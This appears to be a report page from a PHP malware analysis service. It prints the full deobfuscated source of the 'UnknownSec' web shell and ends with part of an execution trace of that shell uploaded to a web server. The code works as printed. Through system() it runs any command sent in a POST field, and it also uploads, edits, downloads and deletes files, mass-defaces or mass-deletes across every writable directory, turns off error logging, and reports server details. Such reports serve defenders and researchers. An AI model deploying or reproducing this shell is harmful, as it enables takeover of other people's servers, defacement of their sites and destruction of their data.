PHP Malware Analysis
unknown45.phtml
md5: f78cc4a4245f095c99378fa6a1125fef
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- bootstrap@5.0.1 (Deobfuscated, HTML, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original)
- phpinfo (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- eval (Original)
- system (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$_n} (Deobfuscated)
- ".$_SERVER['HTTP_HOST']." - $_n (Original)
- localhost - UnknownSec (HTML)
URLs
- ftp.sh/style.css (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
/* Mau recode? izin dulu, recode ga izin itu ga keren ajg */
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
date_default_timezone_set('Asia/Jakarta');
$_n = 'UnknownSec';
$_s = "<style>table{display:none;}</style><div class='table-responsive'><hr></div>";
$_r = "required='required'";
$_x = "<i class='bi bi-gear-fill'></i>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ok()
{
echo "<div class=\"alert alert-success alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>";
}
function fail()
{
echo "<div class=\"alert alert-danger alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>";
}
function sz($byt)
{
$sz = array('B', 'KB', 'MB', 'GB', 'TB');
for ($i = 0; $byt >= 1024 && $i < count($sz) - 1; $byt /= 1024, $i++) {
}
return round($byt, 2) . " " . $sz[$i];
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function p($file)
{
if ($p = @fileperms($file)) {
$i = 'u';
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
}
$i .= $p & 0400 ? 'r' : '-';
$i .= $p & 0200 ? 'w' : '-';
$i .= $p & 0100 ? 'x' : '-';
$i .= $p & 040 ? 'r' : '-';
$i .= $p & 020 ? 'w' : '-';
$i .= $p & 010 ? 'x' : '-';
$i .= $p & 04 ? 'r' : '-';
$i .= $p & 02 ? 'w' : '-';
$i .= $p & 01 ? 'x' : '-';
return $i;
} else {
return "- ?? -";
}
}
echo "\n<!DOCTYPE HTML>\n<html>\n\t<head>\n\t\t<meta name='author' content='{$_n}'>\n\t\t<meta name='robots' content='noindex,nofollow'>\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$_n}</title>\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70'>\n\t\t<link rel='stylesheet' href='//random-php.ftp.sh/style.css'>\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>\n\t\t<script src='//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script>\n\t\t<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\n\t</head>\n<style>\n.shell {\n\tborder-radius: 4px;\n\tborder: 1px solid rgba(255, 255, 255, 0.4);\n\tfont-size: 10pt;\n\tdisplay: flex;\n\tflex-direction: column;\n\talign-items: stretch;\n\tbackground: #242424;\n\tcolor: #fff;\n}\n.pre {\n\theight: 150px;\n\toverflow: auto;\n\twhite-space: pre-wrap;\n\tflex-grow: 1;\n}\n</style>\n<body class='bg-secondary text-light'>\n<div class='container-fluid'>\n\t<div class='py-3' id='main'>\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\n\t\t\t<div class='corner text-secondary'>shell bypass 403</div>\n\t\t\t\t<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$_n} Shell</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<div class=\"table-responsive\"><i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a class=\"text-decoration-none\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]</div>";
echo "\n\t\t</div>\n\t</div>\n</div>\n<div class='container-fluid'>\n\t<div class='box shadow bg-dark p-4 rounded-3'>\n\t\t<div class='text-center'>\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=upload&path={$path}'><i class='bi bi-upload'></i> upload</a>\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=deface&path={$path}'><i class='bi bi-exclamation-diamond'></i> mass deface</a>\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=delete&path={$path}'><i class='bi bi-trash'></i> mass delete</a>\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=cmd&path={$path}'><i class='bi bi-terminal'></i> console</a>\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=info&path={$path}'><i class='bi bi-info-circle'></i> info server</a>\n\t\t</div>";
// tools nya
if (isset($_GET['path'])) {
$dir = $_GET['path'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'deface') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<gr>success</gr>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<gr>success</gr>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "{$_s}\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<form method='POST'>\n\t\t<kbd>{$_x} Mass deface</kbd>\n\t\t<br>Tipe:<br>\n\t\t<div class='custom-control custom-switch'>\n\t\t\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\n\t\t\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\n\t\t</div>\n\t\t<div class='custom-control custom-switch'>\n\t\t\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\n\t\t\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\n\t\t</div>\n\t\t\t<i class='bi bi-folder'></i> Lokasi:\n\t\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\n\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\n\t\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' {$_r}>\n\t\t\t<i class='bi bi-file-earmark'></i> Isi file:\n\t\t\t<textarea class='form-control btn-sm' rows='7' name='script' placeholder='isi file' {$_r}></textarea>\n\t\t\t<input class='btn btn-dark btn-sm btn-block' type='submit' name='start' value='mass deface'>\n\t\t</form>\n\t</div>\n</div>\n<br>";
}
} elseif ($_GET['id'] == 'cmd') {
if ($_POST['ekseCMD']) {
$cmd = $_POST['ekseCMD'];
}
echo "{$_s}\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t<kbd>{$_x} Console</kbd>\n\t\t<div class='container-fluid language-javascript'>\n\t\t\t<pre style='font-size:10px;'><gr>~</gr>\$ <rd>{$cmd}</rd><br><code>";
system($_POST['ekseCMD'] . ' 2>&1');
echo "</code></pre>\n\t\t</div>\n\t\t<form method='POST'>\n\t\t\t<div class='input-group mb-3'>\n\t\t\t\t<input class='form-control btn-sm' type='text' name='ekseCMD' value='{$cmd}' placeholder='whoami' {$_r}>\n\t\t\t\t<button class='btn btn-dark btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>\n\t\t\t</div>\n\t\t</form>\n\t</div>\n</div>\n<br>";
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<gr>NONE</gr>";
} else {
$disfc = "<rd>{$disfunc}</rd>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<rd>ON</rd>" : "<gr>OFF</gr>";
echo "{$_s}\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t<kbd>{$_x} Info server</kbd>\n\t\t<br>\n\t\tUname: <gr>" . php_uname() . "</gr><br />\n\t\tSoftware: <gr>" . $_SERVER['SERVER_SOFTWARE'] . "</gr><br />\n\t\tPHP version: <gr>" . PHP_VERSION . "</gr> <a class='text-decoration-none' href='?id=phpinfo&path={$path}'>[ PHP INFO ]</a> PHP os: <gr>" . PHP_OS . "</gr><br />\n\t\tServer Ip: <gr>" . gethostbyname($_SERVER['HTTP_HOST']) . "</gr><br />\n\t\tYour Ip: <gr>" . ip() . "</gr><br />\n\t\tUser: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br />\n\t\tSafe Mode: {$sm}<br />\n\t\t<kbd>Disable Function:</kbd><pre>{$disfc}</pre>\n\t</div>\n</div>\n<br>";
} elseif ($_GET['id'] == 'phpinfo') {
@ob_start();
@phpinfo();
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff, "<body>") + 6;
$akhir = strpos($buff, "</body>");
echo "<pre class='php_info'>" . substr($buff, $awal, $akhir - $awal) . "</pre>";
exit;
} elseif ($_GET['id'] == 'upload') {
echo "{$_s}\n<div class='card text-dark'>\n\t<div class='card-header'>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '<strong>Upload</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Upload</strong> fail! ' . fail() . '</div>';
}
}
echo "\n\t\t<form method='POST' enctype='multipart/form-data'>\n\t\t\t<kbd>{$_x} Upload File</kbd>\n\t\t\t<div class='input-group mb-3'>\n\t\t\t\t<input type='file' class='form-control form-control-sm' name='file' {$_r}>\n\t\t\t\t<button type='submit' class='btn btn-dark btn-sm'><i class='bi bi-arrow-return-right'></i></button>\n\t\t\t</div>\n\t\t</form>\n\t</div>\n</div>\n<br>";
} elseif ($_GET['id'] == 'filebaru') {
if (isset($_POST['bikin'])) {
$name = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
foreach ($name as $nama_file) {
$handle = @fopen("{$nama_file}", "w");
if ($isi_file) {
$buat = @fwrite($handle, $isi_file);
} else {
$buat = $handle;
}
}
if ($buat) {
echo '<strong>Buat file</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Buat file</strong> fail! ' . fail() . '</div>';
}
}
echo "{$_s}\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<kbd>{$_x} Buat file</kbd>\n\t\t<form method='POST'>\n\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\n\t\t\t<input type='text' class='form-control form-control-sm' name='nama_file[]' placeholder='Nama file' {$_r}>\n\t\t\t<i class='bi bi-file-earmark'></i> Isi file:\n\t\t\t<textarea name='isi_file' class='form-control form-control-sm' rows='7' placeholder='Isi file' {$_r} ></textarea>\n\t\t\t<input type='submit' class='btn btn-dark btn-sm btn-block' name='bikin' value='buat'>\n\t\t</form>\n\t</div>\n</div>\n<br>";
} elseif ($_GET['id'] == 'dirbaru') {
if (isset($_POST['buat'])) {
$nama = $_POST['nama_folder'];
foreach ($nama as $nama_folder) {
$folder = preg_replace("([^\\w\\s\\d\\-_~,;:\\[\\]\\(\\].]|[\\.]{2,})", '', $nama_folder);
$fd = @mkdir($folder);
}
if ($fd) {
echo '<strong>Buat dir</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Buat dir</strong> fail! ' . fail() . '</div>';
}
}
echo "{$_s}\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<kbd>{$_x} Buat dir</kbd>\n\t\t<form method='POST'>\n\t\t\t<i class='bi bi-folder'></i> Nama dir:\n\t\t\t<div class='input-group mb-3'>\n\t\t\t\t<input type='text' class='form-control form-control-sm' name='nama_folder[]' placeholder='Nama dir' {$_r}>\n\t\t\t\t<input type='submit' class='btn btn-dark btn-sm' name='buat' value='buat'>\n\t\t\t</div>\n\t\t</form>\n\t</div>\n</div>\n<br>";
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<gr>deleted</gr>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "{$_s}\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<form method='POST'>\n\t\t<kbd>{$_x} Mass delete</kbd>\n\t\t<br>\n\t\t<i class='bi bi-folder'></i> Lokasi:\n\t\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\n\t\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\n\t\t\t<div class='input-group mb-3'>\n\t\t\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' {$_r}><br>\n\t\t\t<div class='input-group-append'>\n\t\t\t\t<input class='btn btn-dark btn-sm' type='submit' name='start' value='mass delete'>\n\t\t\t</div>\n\t\t</form>\n\t\t</div>\n\t</div>\n</div>\n<br>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<div class="shell pre"><pre style="font-size:10px;">' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre></div><br/>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//rename file
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '<strong>Rename</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Rename</strong> fail! ' . fail() . '</div>';
}
$_POST['name'] = $_POST['newname'];
}
echo '
<form method="POST">
<div class="input-group mb-3">
<input class="form-control form-control-sm" name="newname" type="text" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input class="btn btn-outline-light btn-sm" type="submit" value="rename"/>
</div>
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '<strong>Edit</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Edit</strong> fail! ' . fail() . '</div>';
}
fclose($fp);
}
echo '
<form method="POST">
<textarea class="form-control form-control-sm" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light btn-sm btn-block" type="submit" value="edit"/>
</form>
<br>';
}
} else {
//delete dir & file
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '<strong>Delete dir</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Delete dir</strong> fail! ' . fail() . '</div>';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '<strong>Delete file</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Delete file</strong> fail! ' . fail() . '</div>';
}
}
}
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">name</td>
<td class="text-center">last edit</td>
<td class="text-center">size</td>
<td class="text-center">owner<gr>:</gr>downer</td>
<td class="text-center">permission</td>
<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=' . dirname($dir) . '">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?id=filebaru&path=' . $dir . '"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?id=dirbaru&path=' . $dir . '"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>';
foreach ($scandir as $dir) {
$dt = date("Y-m-d H:i:s", filemtime("{$path}/{$dir}"));
if (function_exists('posix_getpwuid')) {
$downer = @posix_getpwuid(fileowner("{$path}/{$dir}"));
$downer = $downer['name'];
} else {
$downer = fileowner("{$path}/{$dir}");
}
if (function_exists('posix_getgrgid')) {
$dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}"));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup("{$path}/{$dir}");
}
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\n<tr>\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n\t<td class='text-center'>{$dt}</td>\n\t<td class='text-center'>dir</td>\n\t<td class='text-center'>{$downer}<gr>:</gr>{$dgrp}</td>\n\t<td class='text-center'>";
if (is_writable("{$path}/{$dir}")) {
echo "<gr>";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<rd>";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</gr></rd></td>";
}
echo "\n\t<td class=\"text-center\">\n\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t<div class=\"btn-group\">\n\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>\n\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>\n\t\t</div>\n\t\t<input type=\"hidden\" name=\"type\" value=\"dir\">\n\t\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n\t</form>\n\t</td>\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d H:i:s", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
if (function_exists('posix_getpwuid')) {
$fowner = @posix_getpwuid(fileowner("{$path}/{$file}"));
$fowner = $fowner['name'];
} else {
$fowner = fileowner("{$path}/{$file}");
}
if (function_exists('posix_getgrgid')) {
$fgrp = @posix_getgrgid(filegroup("{$path}/{$file}"));
$fgrp = $fgrp['name'];
} else {
$fgrp = filegroup("{$path}/{$file}");
}
echo "\n<tr>\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n\t<td class='text-center'>{$ft}</td>\n\t<td class='text-center'>" . sz(filesize($file)) . "</td>\n\t<td class='text-center'>{$fowner}<gr>:</gr>{$fgrp}</td>\n\t<td class='text-center'>";
if (is_writable("{$path}/{$file}")) {
echo "<gr>";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<rd>";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</gr></rd></td>";
}
echo "\n\t<td class=\"text-center\">\n\t\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t\t<div class=\"btn-group\">\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"edit\"><i class='bi bi-pencil-square'></i></button>\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"download\"><i class='bi bi-download'></i></button>\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>\n\t\t\t</div>\n\t\t\t<input type=\"hidden\" name=\"type\" value=\"file\">\n\t\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n\t\t</form>\n\t</td>\n</tr>";
}
}
echo "\n</tbody>\n</table>\n<div class='text-secondary'>© " . date("Y") . " {$_n}</div>\n</div>\n</div>\n</body>\n</html>";Execution traces
data/traces/f78cc4a4245f095c99378fa6a1125fef_trace-1676244176.0664.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:23:21.964196]
1 0 1 0.000185 393576
1 3 0 0.000826 526408 {main} 1 /var/www/html/uploads/unknown45.phtml 0 0
2 4 0 0.000845 526408 set_time_limit 0 /var/www/html/uploads/unknown45.phtml 6 1 0
2 4 1 0.000863 526472
2 4 R FALSE
2 5 0 0.000878 526440 error_reporting 0 /var/www/html/uploads/unknown45.phtml 7 1 0
2 5 1 0.000892 526480
2 5 R 22527
2 6 0 0.000905 526440 ini_set 0 /var/www/html/uploads/unknown45.phtml 8 2 'error_log' NULL
2 6 1 0.000920 526512
2 6 R ''
2 7 0 0.000933 526440 ini_set 0 /var/www/html/uploads/unknown45.phtml 9 2 'log_errors' 0
2 7 1 0.000948 526512
2 7 R '1'
2 8 0 0.000961 526440 ini_set 0 /var/www/html/uploads/unknown45.phtml 10 2 'max_execution_time' 0
2 8 1 0.000975 526480
2 8 R '0'
2 9 0 0.000988 526408 ini_set 0 /var/www/html/uploads/unknown45.phtml 11 2 'output_buffering' 0
2 9 1 0.001002 526480
2 9 R FALSE
2 10 0 0.001015 526408 ini_set 0 /var/www/html/uploads/unknown45.phtml 12 2 'display_errors' 0
2 10 1 0.001029 526480
2 10 R ''
2 11 0 0.001041 526408 date_default_timezone_set 0 /var/www/html/uploads/unknown45.phtml 13 1 'Asia/Jakarta'
2 11 1 0.001058 526472
2 11 R TRUE
1 A /var/www/html/uploads/unknown45.phtml 14 $_n = 'UnknownSec'
1 A /var/www/html/uploads/unknown45.phtml 15 $_s = '<style>table{display:none;}</style><div class=\'table-responsive\'><hr></div>'
1 A /var/www/html/uploads/unknown45.phtml 16 $_r = 'required=\'required\''
1 A /var/www/html/uploads/unknown45.phtml 17 $_x = '<i class=\'bi bi-gear-fill\'></i>'
2 12 0 0.001126 526424 getcwd 0 /var/www/html/uploads/unknown45.phtml 128 0
2 12 1 0.001140 526472
2 12 R '/var/www/html/uploads'
1 A /var/www/html/uploads/unknown45.phtml 128 $path = '/var/www/html/uploads'
2 13 0 0.001166 526472 str_replace 0 /var/www/html/uploads/unknown45.phtml 130 3 '\\' '/' '/var/www/html/uploads'
2 13 1 0.001182 526568
2 13 R '/var/www/html/uploads'
1 A /var/www/html/uploads/unknown45.phtml 130 $path = '/var/www/html/uploads'
2 14 0 0.001207 526472 explode 0 /var/www/html/uploads/unknown45.phtml 131 2 '/' '/var/www/html/uploads'
2 14 1 0.001222 527048
2 14 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/unknown45.phtml 131 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/unknown45.phtml 132 $id = 0
1 A /var/www/html/uploads/unknown45.phtml 134 $a = TRUE
1 A /var/www/html/uploads/unknown45.phtml 132 $id = 1
1 A /var/www/html/uploads/unknown45.phtml 140 $i = 0
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 132 $id = 2
1 A /var/www/html/uploads/unknown45.phtml 140 $i = 0
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 132 $id = 3
1 A /var/www/html/uploads/unknown45.phtml 140 $i = 0
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 132 $id = 4
1 A /var/www/html/uploads/unknown45.phtml 140 $i = 0
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
1 A /var/www/html/uploads/unknown45.phtml 140 $i++
2 15 0 0.001463 526976 p 1 /var/www/html/uploads/unknown45.phtml 146 1 '/var/www/html/uploads'
3 16 0 0.001476 526976 fileperms 0 /var/www/html/uploads/unknown45.phtml 66 1 '/var/www/html/uploads'
3 16 1 0.001492 527040
3 16 R 16895
2 A /var/www/html/uploads/unknown45.phtml 66 $p = 16895
2 A /var/www/html/uploads/unknown45.phtml 67 $i = 'u'
2 A /var/www/html/uploads/unknown45.phtml 72 $i = 'd'
2 A /var/www/html/uploads/unknown45.phtml 75 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 76 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 77 $i .= 'x'
2 A /var/www/html/uploads/unknown45.phtml 78 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 79 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 80 $i .= 'x'
2 A /var/www/html/uploads/unknown45.phtml 81 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 82 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 83 $i .= 'x'
2 15 1 0.001633 527040
2 15 R 'drwxrwxrwx'
2 17 0 0.001647 527040 ▟ 1 /var/www/html/uploads/unknown45.phtml 146 2 '/var/www/html/uploads' 'drwxrwxrwx'
